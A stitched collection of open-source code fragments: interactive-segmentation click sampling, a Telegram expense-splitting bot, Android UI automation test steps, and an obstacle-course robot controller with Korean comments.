label = np.where(label_unmodified == instance, 1, 0)
# If an old label is available, then sample positive clicks on the difference between the two.
if old_label is not None:
# The difference should be taken only if there is atleast one object pixel in the difference.
label = np.max(0, label - old_label) if np.any((label - old_label) == 1) else label
# Leave a margin around the object boundary
img_area = morphology.binary_erosion(label, morphology.diamond(D_MARGIN))
img_area = img_area if len(np.where(img_area == 1)[0]) > 0 else np.copy(label)
# Set of ground truth pixels.
O = np.where(img_area == 1)
# Randomly sample the number of positive clicks and negative clicks to use.
num_clicks_pos = 0 if len(O) == 0 else random.sample(list(range(1, Npos + 1)), 1)
# num_clicks_pos = random.sample(range(1, Npos + 1), 1)
pts = get_sampled_locations(O, img_area, num_clicks_pos)
u1 = get_distance_transform(pts, img_area, img=img, dt_method=dt_method)
return u1, pts
def get_neg_dst_transform(label_unmodified, img, instance, strategy, ignore_classes, old_label=None, dt_method="edt"):
"""
:param img: input image: this would be used to calculate geodesic distance.
:param ignore_classes:
:param dt_method: 'edt' for euclidean distance and 'geodesic' for geodesic distance.
:param old_label: old label, if available
:param label_unmodified: unmodified label which contains all the instances
:param instance: The instance number to segment
:param strategy: value in [1,2,3]
1 - Generate random clicks from the background, which is D pixels away from the object.
2 - Generate random clicks on each negative object.
3 - Generate random clicks around the object boundary.
:return: Negative distance transform map
"""
label = np.where(label_unmodified == instance, 1, 0)
g_c = get_image_area_to_sample(label)
pts = []
if strategy in [1,3]:
if strategy == 1:
num_neg_clicks = random.sample(list(range(0, Nneg1 + 1)), 1)
pts = get_sampled_locations(np.where(g_c == 1), g_c, num_neg_clicks)
else:
# First negative click is randomly sampled in g_c
pts = get_sampled_locations(np.where(g_c == 1), g_c, [1])
g_c_copy = np.copy(g_c)
g_c_copy[list(zip(*(val for val in pts)))] = 0
dt = distance_transform_edt(g_c_copy)
# Sample successive points using p_next = arg max f(p_ij | s0 U g), where p_ij in g_c, s0 is the set of all
# sampled points, and 'g' is the complementary set of g_c
for n_clicks in range(2, Nneg3 + 1):
if np.max(dt) > 0:
row, col = np.where(dt == np.max(dt))
row, col = zip(row, col)[0]
pts.append((row, col))
x_min = max(0, row - D)
x_max = min(row + D, dt.shape[0])
y_min = max(0, col - D)
y_max = min(col + D, dt.shape[1])
dt[x_min:x_max, y_min:y_max] = 0
elif strategy == 2:
# Get all negative object instances.
instances = np.setdiff1d(np.unique(label_unmodified), np.append(instance, ignore_classes))
num_neg_clicks = random.sample(list(range(0, Nneg2 + 1)), 1)
for i in instances:
g_c = np.where(label_unmodified == i)
label = np.where(label_unmodified == i, 1, 0)
pts_local = get_sampled_locations(g_c, np.copy(label), num_neg_clicks)
pts = pts + pts_local
u0 = get_distance_transform(pts, label, img=img, dt_method=dt_method)
return u0, pts
def get_distance_transform(pts, label, img=None, dt_method="edt"):
dt = np.ones_like(label)
if len(pts) > 0:
if dt_method == "geodesic" and img is not None:
# dt = np.where(dt != 0, 1e5, 0)
dt = geo_dist(img, list(zip(*(val for val in pts))))
else:
dt[list(zip(*(val for val in pts)))] = 0
dt = distance_transform_edt(dt)
return dt
else:
# This is important since we divide it by 255 while normalizing the inputs.
return dt * 255
def get_sampled_locations(sample_locations, img_area, num_clicks):
d_step = int(D / 2)
img = np.copy(img_area)
pts = []
for click in range(num_clicks[0]):
pixel_samples = list(zip(sample_locations[0], sample_locations[1]))
if len(pixel_samples) > 1:
[x, y] = random.sample(pixel_samples, 1)[0]
pts.append([x, y])
x_min = max(0, x - d_step)
x_max = min(x + d_step, img.shape[0])
y_min = max(0, y - d_step)
y_max = min(y + d_step, img.shape[1])
img[x_min:x_max, y_min:y_max] = 0
sample_locations = np.where(img == 1)
return pts
def get_image_area_to_sample(img):
"""
calculate set g_c, which has two properties
1) They represent background pixels
2) They are within a certain distance to the object
:param img: Image that represents the object instance
"""
#TODO: In the paper 'Deep Interactive Object Selection', they calculate g_c first based on the original object instead
# of the dilated one.
# Dilate the object by d_margin pixels to extend the object boundary
img_area = np.copy(img)
img_area = morphology.binary_dilation(img_area, morphology.diamond(D_MARGIN)).astype(np.uint8)
g_c = np.logical_not(img_area).astype(int)
g_c[np.where(distance_transform_edt(g_c) > D)] = 0
return g_c
def load_clustering_labels(clustering_path):
from Log import log
import pickle
with open(clustering_path, "rb") as f:
x = pickle.load(f)
labels = x["class_labels"]
print("class labels from", clustering_path, ":", labels, file=log.v1)
assert labels[0] == "outliers", labels
clustering_labels = list(labels[1:])
n_classes = len(clustering_labels)
label_map = {}
for idx, label in enumerate(clustering_labels):
label_map[idx] | |
<reponame>KanegaeGabriel/SplitXPBot
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from os import environ
import logging
import auth # Telegram Bot Token
from DBM import DBM
from Transaction import Transaction
from utils import *
def kill(bot, update):
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
s = dbm.killAllTables()
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def help(bot, update): # /help
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
h = [
"*{U}* commands can be used by anyone. *{A}* can be used only by group admins. ",
"If used in a private chat, all commands can be used.\n",
"\n",
"*{U}* `/start`\n",
"> Starts the bot and initializes the database.\n",
"\n",
"*{U}* `/help`\n",
"> Shows this message.\n",
"\n",
"*{A}* `/reset`\n",
"> Resets the database.\n",
"\n",
"*{U}* `/gaveTo (@user) (amount) [description]`\n",
"> Records that you gave `amount` to `@user`.\n",
"\n",
"*{U}* `/gaveMe (@user) (amount) [description]`\n",
"> Records that `@user` gave `amount` to you.\n",
"\n",
"*{A}* `/whoGaveWho (@userA) (@userB) (amount) [description]`\n",
"> Records that `@userA` gave `amount` to `@userB`.\n",
"\n",
"*{U}* `/total [@user]`\n",
"> Shows how much `@user` owes and is owed. Defaults to you.\n",
"\n",
"*{U}* `/recent [@user|all] [n]`\n",
"> Lists the `n` most recent transactions involving `@user|all`.\n",
"\n",
"*{A}* `/config (GMToffset) (currency)`\n",
"> Configures the bot to your liking:\n"
" `GMToffset`: Hours to add/sub from the GMT timezone. e.g. `3`, `-2`.\n"
" `currency`: Currency symbol to use. e.g. `$`, `US$`.\n"
]
s = "".join(h)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def start(bot, update): # /start
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
h = [
"Hi! I am SplitXPBot! I'm here to manage your shared expenses! ",
"I can be used in a group chat or in a private one. :)\n",
"\n",
"Type `/help` to see the available commands.\n"
"\n",
"Also, be sure to configure me to your liking with `/config`!\n",
]
dbm.newChat(chatID)
s = "".join(h)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def reset(bot, update): # /reset
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if not canRunAdmin:
s = "You are not allowed to use that command. Please ask a group admin."
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
s = dbm.resetChat(chatID, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def config(bot, update, args): # /config (GMToffset) (currency)
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
if len(args) != 2:
s = "Command usage: `/config (GMT offset) (currency)`\n"
s += " `GMT offset`: Hours to add/sub from the GMT timezone. e.g. `3`, `-2`.\n"
s += " `currency`: Currency symbol to use. e.g. `$`, `US$`.\n"
elif not isInt(args[0]):
s = "Invalid GMT offset. Please give me an integer value."
elif abs(int(args[0])) > 12:
s = "Invalid GMT offset. Please give me a value between -12 and 12."
elif len(args[1]) > 5:
s = "Your currency symbol is too long. Please don't go over 5 characters."
else:
GMToffset = int(args[0])
currency = args[1]
s = dbm.setConfig(chatID, GMToffset, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def gaveTo(bot, update, args): # /gaveTo (@user) (amount) [description]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if len(args) > 1: args[1] = args[1].replace(",", ".")
if myself == "None":
s = "How come you don't have a Telegram username? Please create one."
elif len(args) < 2:
s = "Command usage: `/gaveTo (@user) (amount) [description]`"
elif args[0][0] != "@":
s = "Please call a user by their Telegram username, starting with @."
elif not isFloat(args[1]):
s = "The amount has to be a number."
elif float(args[1]) < 0.01:
s = "Only positive amounts, please!"
elif args[0].replace("@", "") == myself:
s = "You can't make a transaction with yourself!"
else:
user = args[0].replace("@", "")
amount = float(args[1])
description = " ".join(args[2:])
if len(description) > 50:
description = description[:(50-3)] + "..."
s = dbm.saveTransaction(chatID, Transaction(myself, user, amount, description), GMToffset, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def gaveMe(bot, update, args): # /gaveMe (@user) (amount) [description]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if len(args) > 1: args[1] = args[1].replace(",", ".")
if myself == "None":
s = "How come you don't have a Telegram username? Please create one."
elif len(args) < 2:
s = "Command usage: `/gaveMe (@user) (amount) [description]`"
elif args[0][0] != "@":
s = "Please call a user by their Telegram username, starting with @."
elif not isFloat(args[1]):
s = "The amount has to be a number."
elif float(args[1]) < 0.01:
s = "Only positive amounts, please!"
elif args[0].replace("@", "") == myself:
s = "You can't make a transaction with yourself!"
else:
user = args[0].replace("@", "")
amount = float(args[1])
description = " ".join(args[2:])
if len(description) > 50:
description = description[:(50-3)] + "..."
s = dbm.saveTransaction(chatID, Transaction(user, myself, amount, description), GMToffset, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def whoGaveWho(bot, update, args): # /whoGaveWho (@userA) (@userB) (amount) [description]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if not canRunAdmin:
s = "You are not allowed to use that command. Please ask a group admin."
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if len(args) > 2: args[2] = args[2].replace(",", ".")
if myself == "None":
s = "How come you don't have a Telegram username? Please create one."
elif len(args) < 3:
s = "Command usage: `/whoGaveWho (@userA) (@userB) (amount) [description]`"
elif args[0][0] != "@" or args[1][0] != "@":
s = "Please call a user by their Telegram username, starting with @."
elif not isFloat(args[2]):
s = "The amount has to be a number."
elif float(args[2]) < 0.01:
s = "Only positive amounts, please!"
else:
userA = args[0].replace("@", "")
userB = args[1].replace("@", "")
amount = float(args[2])
description = " ".join(args[3:])
if len(description) > 50:
description = description[:(50-3)] + "..."
s = dbm.saveTransaction(chatID, Transaction(userA, userB, amount, description), GMToffset, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def total(bot, update, args): # /total [@user]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if len(args) > 0 and args[0] != "all" and args[0][0] != "@":
s = "Please call a user by their Telegram username, starting with @."
else:
if len(args) > 0 and args[0] == "all":
s = dbm.printAllTotals(chatID, currency)
elif len(args) > 0:
user = args[0].replace("@", "")
s = dbm.printTotal(chatID, user, currency)
else:
s = dbm.printTotal(chatID, myself, currency)
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
def recent(bot, update, args): # /recent [@user|all] [n]
printCommandExecution(bot, update)
myself, text, isGroup, chatID, chatName, canRunAdmin = getMsgAttributes(bot, update)
GMToffset, currency = dbm.getConfig(chatID)
if GMToffset == None and currency == None:
s = "I couldn't find some important data. Are you sure you have already run `/start`?"
bot.send_message(chat_id=chatID, text=s, parse_mode="Markdown")
return
if myself == "None":
s = "How come you don't have a Telegram username? Please create one."
elif len(args) > 0 and (args[0] != "all" and args[0][0] != "@"):
s = "Please call a user by their Telegram username, starting with @."
elif len(args) > 1 and not isInt(args[1]):
s = "The amount has to be a number."
else:
if len(args) == 0:
s = dbm.printRecent(chatID, myself, 5, GMToffset, currency)
elif len(args) == 1:
user = args[0].replace("@", "")
s = dbm.printRecent(chatID, | |
<reponame>wangji1/test-framework-and-suites-for-android
#!/usr/bin/env python
"""
Copyright (C) 2018 Intel Corporation
?
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
?
http://www.apache.org/licenses/LICENSE-2.0
?
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
?
SPDX-License-Identifier: Apache-2.0
"""
# standard libraries
import time
import traceback
from testlib.scripts.android.ui.ui_step import step as ui_step
from testlib.scripts.android.ui import ui_utils
from testlib.utils.connections.adb import Adb
from testlib.base.base_step import BlockingError
from testlib.base.abstract.abstract_step import devicedecorator, applicable, notapplicable
class dump(ui_step):
""" description:
dumps the ui objects to stdout or a file
usage:
ui_steps.dump() - dumps to stdout
ui.steps.dump("/path/to/out_file.xml") - dumps to fil
tags:
ui, android, dump, xml, file
"""
out_file = None
def __init__(self, out_file=None, **kwargs):
ui_step.__init__(self, **kwargs)
self.out_file = out_file
def do(self):
if self.out_file:
self.uidevice.dump(out_file=self.out_file,
compressed=False, serial=self.serial)
else:
print self.uidevice.dump(compressed=False, serial=self.serial)
def check_condition(self):
return True
@devicedecorator
class set_pin_screen_lock():
""" description:
sets screen lock method to PIN <selected PIN>
if already set to PIN, it will skip
usage:
ui_steps.set_pin_screen_lock(pin = "1234")()
tags:
ui, android, click, button
"""
pass
@devicedecorator
class remove_pin_screen_lock():
""" description:
sets screen lock method to PIN <selected PIN>
if already set to PIN, it will skip
usage:
ui_steps.set_pin_screen_lock(pin = "1234")()
tags:
ui, android, click, button
"""
pass
@devicedecorator
class open_security_settings():
""" description:
Opens the Security Settings page using an intent.
usage:
ui_steps.open_security_settings()()
tags:
ui, android, settings, security, intent
"""
pass
@devicedecorator
class open_users_settings():
""" description:
Opens the Security Settings page using an intent.
usage:
ui_steps.open_security_settings()()
tags:
ui, android, settings, security, intent
"""
pass
@devicedecorator
class am_start_command():
""" description:
Opens the WiFi Settings page using an intent.
usage:
wifi_steps.open_wifi_settings()()
tags:
ui, android, settings, wifi, intent
"""
pass
@devicedecorator
class am_stop_package():
""" Description:
Executes command 'adb shell am force-stop [package_name]'. Pass
package name to package_name parameter.
Usage:
ui_steps.am_stop_package(serial=serial,
package_name="com.android.settings")()
tags:
ui, android, stop, package
"""
pass
class click_view(ui_step):
""" description:
clicks a view <view>
if <view_to_check> given it will check that the object
identified by <view_to_check>:
- appeared if <view_presence> is True
- disappeared if <view_presence> is False
usage:
ui_steps.click_button(view_to_find = {"resourceId":
"com.intel.TelemetrySetup:id/button_allow"},
view_to_check = {"text": "OK"})()
tags:
ui, android, click, button
"""
def __init__(self, view, view_to_check=None,
view_presence=True, wait_time=10000, **kwargs):
ui_step.__init__(self, **kwargs)
self.view = view
self.view_to_check = view_to_check
self.view_presence = view_presence
self.wait_time = wait_time
self.set_errorm(
"", "Could not click view {0} checking {1}".format(view, view_to_check))
self.set_passm(
"View {0} clicked checking {1}".format(view, view_to_check))
def do(self):
self.view.click.wait()
def check_condition(self):
if self.view_to_check is None:
return True
if self.view_presence:
check_state = self.uidevice(
**self.view_to_check).wait.exists(timeout=self.wait_time)
else:
check_state = self.uidevice(
**self.view_to_check).wait.gone(timeout=self.wait_time)
return check_state
# TODO: rename with open_quick_settings_with_swipe
# add desciption
@devicedecorator
class open_notifications_menu():
pass
class click_xy(ui_step):
""" description:
clicks on the devices on x, y
usage:
ui_steps.click_xy(x = 100, y = 100)()
tags:
ui, android, click, coords
"""
def __init__(self, x, y, view_to_check=None, use_adb=True, **kwargs):
self.x = x
self.y = y
self.view_to_check = view_to_check
self.use_adb = use_adb
ui_step.__init__(self, **kwargs)
self.step_data = False
self.set_passm("Coordinates ({0} x {1}) clicked".format(x, y))
self.set_errorm(
"", "Could not click coordinates ({0} x {1})".format(x, y))
def do(self):
if self.use_adb:
cmd = "input tap {0} {1}".format(self.x, self.y)
adb_connection = Adb(serial=self.serial)
output = adb_connection.run_cmd(cmd)
if output:
self.step_data = True
else:
self.step_data = self.uidevice.click(self.x, self.y)
def check_condition(self):
if not self.step_data:
return self.step_data
if self.view_to_check is None:
return True
self.uidevice.wait.update()
return self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
class long_click(ui_step):
""" description:
long clicks a button identified by <view_to_check>
if <view_to_check> given it will check that the object
identified by <view_to_check>:
- appeared if <view_presence> is True
- disappeared if <view_presence> is False
usage:
ui_steps.long_click(view_to_find = {"resourceId":
"com.intel.TelemetrySetup:id/button_allow"},
view_to_check = {"text": "OK"})()
tags:
ui, android, long_click, button
"""
view_to_find = None
view_to_check = None
view_presence = None
def __init__(self, view_to_find, view_to_check=None,
view_presence=True, **kwargs):
ui_step.__init__(self, **kwargs)
self.view_to_find = view_to_find
self.view_to_check = view_to_check
self.view_presence = view_presence
def do(self):
self.uidevice(**self.view_to_find).long_click()
def check_condition(self):
if self.view_to_check is None:
return True
exists = self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
return exists if self.view_presence else not exists
class edit_text(ui_step):
""" description:
puts value in text view identified by view_to_check
usage:
ui_steps.edit_text(view_to_find = {"resourceId":
"com.intel.TelemetrySetup:id/text"},
value = "text to input")()
scroll - scroll for the desired view and then edit the text.
clear_text - clear the text before writing 'value'(default is True)
tags:
ui, android, edit, text
"""
view_to_find = None
value = None
is_password = None
def __init__(self, view_to_find, value, is_password=False, scroll=False, clear_text=True, **kwargs):
ui_step.__init__(self, **kwargs)
self.view_to_find = view_to_find
self.value = value
self.is_password = <PASSWORD>
self.scroll = scroll
self.clear_text = clear_text
self.set_passm("Edit {0} with {1}".format(view_to_find, value))
self.set_errorm(
"", "Could not edit {0} with {1}".format(view_to_find, value))
def do(self):
self.uidevice.wait.idle()
if self.scroll and self.uidevice(className="android.widget.ScrollView",
scrollable=True).wait.exists(timeout=1000):
self.uidevice(scrollable=True).scroll.to(**self.view_to_find)
text_field = self.uidevice(**self.view_to_find)
while self.clear_text and text_field.info['text']:
before = text_field.info['text']
text_field.clear_text()
after = text_field.info['text']
if before == after:
break
# if adb_utils.is_virtual_keyboard_on(serial = self.serial):
# press_back(serial = self.serial)()
if text_field.info["className"] != "com.android.keyguard.PasswordTextView":
text_field.set_text(self.value)
else:
for character in self.value:
click_button(serial=self.serial,
view_to_find={"text": character,
"resourceId": "com.android.systemui:id/digit_text"})()
def check_condition(self):
# if adb_utils.is_virtual_keyboard_on(serial = self.serial):
# press_back(serial = self.serial)()
if self.is_password:
return True
return (self.uidevice(textContains=self.value).wait.exists(timeout=1000))
class scroll_up_to_view(ui_step):
""" description:
scrolls up on until <view_to_check> is shown using swipe
You can scroll "down" if you overwrite ey to <300.
usage:
ui_steps.scroll_up_to_view(view_to_check = "Bluetooth")()
tags:
ui, android, swipe, scroll
"""
def __init__(self, view_to_check, sx=300, sy=300, ex=300, ey=400, iterations=10, **kwargs):
self.start_x = sx
self.start_y = sy
self.end_x = ex
self.end_y = ey
self.view_to_check = view_to_check
self.iterations = iterations
ui_step.__init__(self, **kwargs)
def do(self):
iterations = 0
while (not self.uidevice(**self.view_to_check).wait.exists(timeout=1000) and
iterations < self.iterations):
swipe(serial=self.serial,
sx=self.start_x, sy=self.start_y,
ex=self.end_x, ey=self.end_y,
steps=10)()
iterations += 1
def check_condition(self):
return self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
class swipe(ui_step):
""" description:
swipes from (<sx>, <sy>) to (<ex>, <ey>)
in <steps> steps
if <view_to_check> given it will check that
the object identified by <view_to_check>:
- appeared if <view_presence> is True
- disappeared if <view_presence> is False after swipe
usage:
ui_steps.swipe(sx = 10, sy = 10, ex = 100, ey = 100)
tags:
ui, android, swipe
"""
def __init__(self, sx, sy, ex, ey, steps=100, view_presence=True,
exists=True, view_to_check=None, wait_time=None, iterations=1, **kwargs):
ui_step.__init__(self, **kwargs)
self.view_presence = view_presence
self.wait_time = wait_time
self.start_x = sx
self.start_y = sy
self.end_x = ex
self.end_y = ey
self.steps = steps
self.exists = exists
self.view_to_check = view_to_check
self.iterations = iterations
def do(self):
iterations = 0
if self.view_to_check:
while iterations < self.iterations:
if not self.uidevice(**self.view_to_check).wait.exists(timeout=1000):
self.uidevice.swipe(self.start_x, self.start_y,
self.end_x, self.end_y, self.steps)
iterations += 1
else:
self.uidevice.swipe(self.start_x, self.start_y,
self.end_x, self.end_y, self.steps)
def check_condition(self):
if self.view_to_check is None:
return True
if self.wait_time:
if self.exists:
self.uidevice(
**self.view_to_check).wait.exists(timeout=self.wait_time)
else:
self.uidevice(
**self.view_to_check).wait.gone(timeout=self.wait_time)
exists = self.uidevice(**self.view_to_check).wait.exists(timeout=1000)
return exists if self.view_presence else not exists
class click_switch(ui_step):
""" description:
changes switch state to argument state value
if already in the desired state do nothing
else clicks the switch and change switched member to
True
usage:
ui_steps.click_switch(
view_to_find = {"className": "android.widget.Switch",
"instance": "1"},
state = "ON",
click_to_close_popup = {"text": "Agree"})()
tags:
ui, android, click, switch, enable, disable
"""
view_to_find = None
state = None
switch = None
def __init__(self, view_to_find, state="ON", click_to_close_popup=None,
right_of=False, wait_time=3000, **kwargs):
ui_step.__init__(self, **kwargs)
self.view_to_find = view_to_find
self.state = state
self.switch = None
self.step_data = False
self.click_to_close_popup = click_to_close_popup
self.right_of = right_of
self.wait_time = wait_time
self.set_passm(
"Set switch {0} to {1}".format(view_to_find, self.state))
self.set_errorm(
"", "Could not set switch {0} to {1}".format(view_to_find, self.state))
def do(self):
wait_for_view(view_to_find=self.view_to_find,
serial=self.serial)()
if self.right_of:
self.switch = self.uidevice(**self.view_to_find).right(
className="android.widget.Switch")
else:
self.switch = self.uidevice(**self.view_to_find)
if self.switch.info['text'] == self.state:
self.step_data = False
else:
self.switch.click.wait()
self.step_data = True
if self.click_to_close_popup:
click_button(serial=self.serial,
print_error="Failed to close popup",
blocking=True,
view_to_find=self.click_to_close_popup)()
def check_condition(self):
if self.right_of:
self.switch = self.uidevice(**self.view_to_find).right(
className="android.widget.Switch", text=self.state).\
wait.exists(timeout=self.wait_time)
else:
self.view_to_find.update({"text": self.state})
self.switch = self.uidevice(
**self.view_to_find).wait.exists(timeout=self.wait_time)
return self.switch
@devicedecorator
class press_all_apps():
""" description:
opens all application activity
usage:
ui_steps.press_all_apps()
tags:
ui, android, press, click, allapps, applications
"""
pass
@devicedecorator
class press_home():
""" description:
opens home page
usage:
ui_steps.press_home()
tags:
ui, android, press, click, home, homepage
"""
pass
@devicedecorator
class press_bell(ui_step):
""" description:
Open bell icon (Notification in android P)
usage:
ui_steps.press_bell(serial=serial)()
tags:
ui, android, press, click, quick setting, bell
"""
pass
class press_back(ui_step):
""" description:
presses the back button. If <view_to_check> is passed it will check
if that view exists
usage:
ui_steps.press_back(view_to_check = {"text": "Bluetooth"})
tags:
ui, android, press, back
"""
| |
<reponame>KangJuSeong/FIRA_RoboWorldCup
import cv2
import numpy as np
import time
import datetime
from library.motion import Motion
from library.image_processor import ImageProcessor
from library.motion import Motion
"""
#----알고리즘----#
# 노랑 or 파랑, 빨강 장애물이 나올 때 까지 걷기 /멈추기: thread walk
# 노랑 or 파랑 장애물
# 5걸음 앞으로
# 밑에 보고 영상 저장, 왼쪽, 오른쪽 체크해서 방향 정함
# 왼쪽, 오른쪽 둘다 선 없으면 밑에보고 저장한 영상으로 더 효율적인 방향 정하기
# escape roi 영상에 장애물 없으면 theadwalk로 다시 가기
#빨강색 장애물
# 빨강색을 센터로
# 앞에 보고 양옆에 파랑색 안보이는지
# 기어감
# theadwalk로 다시 가기
#----동작----#
# 앞으로 걷기
# move 오른쪽
# move 왼쪽
# 고개 - 오블리큐, 업, 왼, 오
"""
# =========================================#
# 1. obs_0_1_check_obstacle_front()
# - oblique로 앞에 노랑, 파랑 장애물이 있는지 체크 (up할 때 안보이는 시야 체크)
#
# 2. obs_0_2_walk_until_obstacle()
# - 노랑 or 파랑, 빨강 장애물이 나올 때 까지 걷기 /멈추기
# | yellow_blue_ratio: 노랑 or 파랑 장애물 thershold
# | red_ratio: 빨강 장애물 thershold
# - 빨강 발견: 6걸음 걷기
# - 노랑 or 파랑 발견: 2걸음 걷기
#
# 3. obs_1_1_choose_direction()
# - 장애물을 어느 방향으로 피할지 결정
# | roiL: 노랑 선 판별 왼쪽 영역
# | roiR: 노랑 선 판별 오른쪽 영역
# - "down" 영상갱신
# | 1) 노랑선 없는 쪽으로
# | 2) 둘다 노랑선 없으면 "down"해서 영상 찍은걸로 오, 왼 중 색 비율 낮은 roi 방향으로
# | 3) 둘다 있으면 비율 낮은 쪽으로
#
# 4. obs_1_3_escape_and_check_obstacle()
# - "down" 영상갱신
# | roi_E: 로봇이 직진할 때 장애물에 부딪히지 않고 갈 수 있는 영역
# - roi_E에 장애물 없다면 장애물 완전히 피하기
# | 피한 방향의 반대 방향 보고 영상갱신
# | side_blue_ratio: 파랑 색
# | 바로 옆 위치 시야에 장애물 걸리면 장애물 피해서 옆걸음 더 함
# - 빨강이 가까이 있는지 체크함
#
# 5. obs_3_1_check_red_center_blue_side()
# - 빨강 센터 맞추기
# | 양 1/3 범위 비교해서 빨강 비율차이 체크
# | 비율 차이 40 퍼센트 이하이면 빨강 가까이 있는지 체크하며서 앞으로감
# - 양쪽 파랑색 장애물 체크
# | roi_L: 왼쪽 파랑 장애물 체크 영역
# | roi_R: 오른쪽 파랑 장애물 체크 영역
# 6. obs_4_1_crawl()
# - 구르기
# =========================================#
class ObstacleRun:
def __init__(self, robot, ip):
# imageProcessor
self.robot = robot
self.ip = ip
# local
self.mission_finished = 0
self.case = 0
self.red_after_blue = 0 # 파랑 장애물 마주치고 빨강 장애물 마주치면 기는 횟수 4번 적게
# self.red_finished = 0 # 빨강 장애물은 하나기 때문에
# 색상 비율
self.yellow_blue_ratio = 3
self.red_ratio = 70
self.red_up_ratio = 62 # 빨강 장애물에 충분히 다가가는지 체크
self.side_blue_yellow_ratio = 10 # 장애물 완전히 피했는지 체크
self.blue_ratio_before_crawl = 60 # 빨강 엎드리기 전에 옆에 파랑 체크
self.now = datetime.datetime.now().strftime("day:%d h:%H m:%M s:%S")
# roi1: 노랑, 파랑 장애물; front, thread
# front: 전방 28~50 cm
# thread: 전방 50~ cm
self.roi1_x_start = int(self.ip.width // 6.5)
self.roi1_x_end = self.ip.width - int(self.ip.width // 6.5)
self.roi1_y_start_front = self.ip.height - int(self.ip.height // 3.5)
self.roi1_y_start_thread = self.ip.height - int(self.ip.height // 4.3)
self.roi1_y_end = self.ip.height
# roi2: 빨강 장애물
self.roi2_x_start = 0
self.roi2_x_end = self.ip.width
self.roi2_y_start = 0
self.roi2_y_end = int(self.ip.height // 5.3)
# roiL: 왼쪽 밑 구석
self.roiL_x_start = 0
self.roiL_x_end = 3 * int(self.ip.width // 4)
self.roiL_y_start = self.ip.height - int(self.ip.height // 3)
self.roiL_y_end = self.ip.height
# roiR: 오른쪽 밑 구석
self.roiR_x_start = int(self.ip.width // 4)
self.roiR_x_end = self.ip.width
self.roiR_y_start = self.ip.height - int(self.ip.height // 3)
self.roiR_y_end = self.ip.height
# escape roi: 가도되는지
self.roiE_x_start = int(self.ip.width // 4.4)
self.roiE_x_end = self.ip.width - int(self.ip.width // 4.4)
self.roiE_y_start = int(self.ip.height * 0.65)
self.roiE_y_end = self.ip.height
# roiS_L: side roi: 빨강 엎드리기 전, 노랑, 파랑 장애물 피하고 옆면 체크
self.roiS_L_x_start = int(self.ip.width // 5)
self.roiS_L_x_end = 2 * int(self.ip.width // 5)
self.roiS_L_y_start = 0
self.roiS_L_y_end = 2 * int(self.ip.height // 3)
# roiS_R: side roi: 빨강 엎드리기 전, 노랑, 파랑 장애물 피하고 옆면 체크
self.roiS_R_x_start = 3 * int(self.ip.width // 5)
self.roiS_R_x_end = 4 * int(self.ip.width // 5)
self.roiS_R_y_start = 0
self.roiS_R_y_end = 2 * int(self.ip.height // 3)
def run(self):
while not self.mission_finished:
self.ip.clear()
# 노랑 or 파랑 / 빨강 장애물이 나올 때 까지 걷기; 멈추기
if self.case == 0:
self.set_head("oblique")
time.sleep(0.3)
is_obstacle = self.obs_0_1_check_obstacle_front()
if is_obstacle:
self.case = 1
else:
self.set_head("up")
time.sleep(0.3)
self.case += self.obs_0_2_walk_until_obstacle() # return = 1 or 3
elif self.case == 1:
# 노랑 or 파랑일 경우
self.set_head("down")
time.sleep(0.3)
self.ip.clear()
frame = self.ip.getFrame()
direction = self.obs_1_1_choose_direction(frame) # return = 2 or 3
self.obs_1_2_move(direction)
self.set_head("down")
time.sleep(0.3)
